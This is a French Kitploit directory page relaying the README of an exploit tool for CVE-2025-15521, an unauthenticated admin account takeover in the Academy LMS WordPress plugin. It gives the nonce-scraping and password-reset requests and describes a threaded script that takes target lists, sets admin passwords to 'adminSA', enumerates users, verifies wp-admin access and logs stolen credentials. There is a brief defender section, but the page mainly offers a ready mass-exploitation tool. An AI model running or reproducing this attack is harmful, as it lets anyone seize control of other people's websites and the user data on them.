Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-15521 — Le plugin Academy LMS – WordPress LMS Plugin for Complete eLearning Solution pour WordPress est vulnérable à l'élévation de privilèges via une prise de contrôle de compte dans toutes les versions jusqu'à la version 3.5.0 incluse. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-15521
ReconnaissanceAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionAuthentification
GitHubnxploited/cve-2025-15521

CVE-2025-15521

Le plugin Academy LMS – WordPress LMS Plugin for Complete eLearning Solution pour WordPress est vulnérable à l'élévation de privilèges via une prise de contrôle de compte dans toutes les versions jusqu'à la version 3.5.0 incluse.

11il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
Partager

CVE-2025-15521

Le plugin Academy LMS – WordPress LMS Plugin for Complete eLearning Solution pour WordPress est vulnérable à une escalade de privilèges via la prise de contrôle de compte dans toutes les versions jusqu'à et y compris la 3.5.0.

root@kitploit:~
 _____ _____ _____     ___ ___ ___ ___     ___   ___ ___ ___ ___  
|     |  |  |   __|___|_  |   |_  |  _|___|_  | |  _|  _|_  |_  | 
|   --|  |  |   __|___|  _| | |  _|_  |___|_| |_|_  |_  |  _|_| |_
|_____|\___/|_____|   |___|___|___|___|   |_____|___|___|___|_____|

Telegram CVE CVSS Python

📡 Suivez @KNxploited — Divulgations CVE et exploits fonctionnels, sans délai.


Qu'est-ce que c'est

CVE-2025-15521 — Prise de contrôle de compte non authentifiée via la réinitialisation de mot de passe dans Academy LMS ≤ 3.5.0.

Le gestionnaire de réinitialisation du plugin authentifie la demande en utilisant uniquement un nonce exposé publiquement (academy_nonce) intégré dans les pages de cours. Aucun token envoyé à l'email de l'utilisateur. Aucune vérification de session. Aucune validation d'identité. Un attaquant qui lit une page de cours obtient un nonce valide, puis réinitialise le mot de passe de n'importe quel compte en fournissant un user_id — y compris user_id=1 (l'administrateur du site).

CVSS 3.1 : 9.8 Critique — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNA : Wordfence


Comment la vulnérabilité fonctionne

root@kitploit:~
GET /course/any-course/
  → Le HTML contient : "academy_nonce": "a1b2c3d4e5"   ← public, aucune authentification

POST /academy-retrieve-password/?user_id=1
  new_password=<n'importe quoi>
  confirm_new_password=<n'importe quoi>
  security=a1b2c3d4e5                               ← nonce accepté

  → Mot de passe pour user_id=1 modifié. Pas d'email. Pas de confirmation.

Le gestionnaire appelle wp_set_password() après avoir seulement vérifié wp_verify_nonce() sur un nonce diffusé à chaque visiteur. Il n'y a aucune vérification que l'utilisateur demandeur possède le compte en cours de modification.


Ce que fait ce script

  1. Parcourt les pages de cours pour extraire un academy_nonce actif
  2. Déclenche le gestionnaire de réinitialisation pour un user_id cible avec un mot de passe choisi
  3. Énumère les noms d'utilisateur via les redirections /?author=N et l'API REST (/wp-json/wp/v2/users)
  4. Tente une connexion stricte pour chaque candidat :
    • Rejette les messages d'échec connus
    • Exige le cookie wordpress_logged_in
    • Exige les marqueurs réels de l'interface admin dans /wp-admin — pas seulement une réponse 200
  5. Écrit les entrées d'accès confirmées dans un fichier de sortie — rien de sensible n'est affiché dans le terminal

Prérequis

root@kitploit:~
pip install requests colorama urllib3

Python 3.8+ requis. Python 3.10+ recommandé.


Utilisation

root@kitploit:~
python CVE-2025-15521.py

Vous serez invité à fournir :

root@kitploit:~
Fichier de liste de cibles (une URL par ligne) : list.txt
Threads (sites simultanés) [5] : 10
Chemin du gestionnaire de réinitialisation [/academy-retrieve-password/] :
Chemin racine du cours (source de la clé) [/course/] :
Nombre max de sous-pages /course/ à analyser par site [15] :
user_id à réinitialiser (cible du gestionnaire) [1] :
Nouveau mot de passe à définir [adminSA] :
Délai d'attente HTTP (secondes) [10] :
Fichier de sortie [scan_results/academy_access_success.txt] :

Fichier de cibles — une URL par ligne, schéma optionnel :

root@kitploit:~
https://target1.com
target2.com
https://target3.com/lms

Sortie

Terminal — une ligne par cible, aucun mot de passe affiché :

root@kitploit:~
[14:02:11] [https://target.com] CLÉ : OK   | RÉINIT : OK   | ACCÈS : 1 SUCCÈS
[14:02:13] [https://target2.com] CLÉ : ÉCHEC | RÉINIT : -    | ACCÈS : 0 SUCCÈS

Fichier — uniquement les entrées d'accès confirmées :

root@kitploit:~
[2025-04-18T14:02:11] https://target.com - compte=admin  motdepasse=adminSA

Détection et Correctif

Pour les défenseurs :

Bloquez ou surveillez les requêtes POST non authentifiées vers le point de terminaison de réinitialisation :

root@kitploit:~
POST *academy-retrieve-password* avec paramètre : security=

Vérifiez l'exposition de rm_admin_order / academy_nonce dans le code source de la page de cours de votre thème. Si le nonce est visible sans être connecté, votre version est concernée.

Étapes de correction immédiates :

  • Mettez à jour Academy LMS vers une version supérieure à 3.5.0
  • Désactivez temporairement le plugin si aucun correctif n'est disponible
  • Auditez les mots de passe administrateur récemment modifiés
  • Forcez la réinitialisation des mots de passe sur tous les comptes administrateur
  • Implémentez une vérification par token basée sur l'email pour tout flux de réinitialisation de mot de passe

⚠️ Avertissement

Cet outil est destiné uniquement à la recherche en sécurité autorisée et aux tests d'intrusion.
Exécutez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite.
L'auteur décline toute responsabilité en cas d'utilisation non autorisée ou illégale.
Une utilisation non autorisée enfreint le CFAA, le CMA, la Directive européenne 2013/40/UE, la Loi anti-cybercriminalité saoudienne n° M/17, et les lois équivalentes dans le monde entier.


Par Nxploited (Khaled Alenazi)
t.me/KNxploited · github.com/Nxploited

🔔 Suivez @KNxploited sur Telegram pour les dernières CVE et publications d'exploits.

Télécharger l’outil